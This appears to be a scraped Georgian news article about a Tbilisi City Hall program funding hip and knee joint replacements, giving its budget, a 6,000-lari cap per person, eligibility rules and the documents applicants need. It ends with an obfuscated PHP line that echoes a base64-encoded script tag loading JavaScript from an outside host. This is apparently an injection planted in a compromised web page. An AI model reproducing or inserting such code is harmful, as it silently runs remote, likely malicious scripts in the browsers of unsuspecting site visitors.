celsiusi
ავერსი საქკაბელი

დედაქალაქის მერიამ დღეიდან სახსრების ენდოპროთეზირების პროგრამა დაიწყო. მუნიციპალიტეტი მენჯ-ბარძაყისა და მუხლის სახსრის ხელოვნური იმპლანტით შეცვლის საჭიროების მქონე პირებს დააფინანსებს.

დედაქალაქის მერიის ინფორმაციით, ახალი პროგრამის მიმდინარე წლის ბიუჯეტი ნახევარი მილიონი ლარი იქნება.

თბილისის მერიის ჯანდაცვისა და სოციალური მომსახურების საქალაქო სამსახურის ახალი პროგრამის მოსარგებლეები იქნებიან: მერიისთვის განცხადებით მიმართვამდე ბოლო ორი წლის განმავლობაში უწყვეტად და, ამავდროულად, პროგრამაში ჩართვის დროისთვის თბილისის მუნიციპალიტეტში რეგისტრირებული საქართველოს მოქალაქეები, რომელთაც აღნიშნული მომსახურება საყოველთაო ჯანდაცვის პროგრამის ფარგლებში არ უფინანსდებათ.

პროგრამით სარგებლობისთვის პირმა ან მისმა კანონიერმა წარმომადგენელმა მერიის ჯანდაცვისა და სოციალური მომსახურების საქალაქო სამსახურს განცხადებით უნდა მიმართოს, რასაც თან უნდა ერთოდეს: პირადობის დამადასტურებელი დოკუმენტის ან პასპორტის ასლი, ხოლო იძულებით გადაადგილებული პირის შემთხვევაში, შესაბამისი სტატუსის დამადასტურებელი დოკუმენტის ასლი; ჯანმრთელობის ცნობა (ფორმა №IV-100/ა – პაციენტის დიაგნოზის, ჩარევებისა და გამოკვლევების მითითებით ICD10 კლასიფიკატორების შესაბამისად); სამედიცინო დაწესებულებიდან მომსახურების ხარჯის დამადასტურებელი დოკუმენტი (ინვოისი); თბილისის მუნიციპალიტეტში ბოლო ორი წლის რეგისტრაციის დამადასტურებელი დოკუმენტი და დაფინანსების შესახებ ცნობა კერძო სადაზღვევო კომპანიიდან (ასეთის არსებობის შემთხვევაში).

თბილისის მერია ერთი მოქალაქის დასაფინანსებლად 6 000 ლარს გამოყოფს. კერძოდ, მომსახურების დაფინანსება განხორციელდება მატერიალიზებული ვაუჩერის/თანხმობის წერილის მეშვეობით, არაუმეტეს 6 000 (ექვსი ათასი) ლარის ოდენობით. პაციენტის თანაგადახდა განისაზღვრება ფაქტობრივი ხარჯის გათვალისწინებით. პროგრამით მოსარგებლეს სამედიცინო დაწესებულებისა და პროთეზის სახეობებს შორის თავისუფალი არჩევანის შესაძლებლობა ექნება. პროგრამის შესახებ დეტალური ინფორმაცია განთავსებულია მერიის ვებგვერდზე – https://tbilisi.gov.ge/img/original/2023/8/29/ndroprotezireba.pdf“, – აცხადებენ მერიაში.

763
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");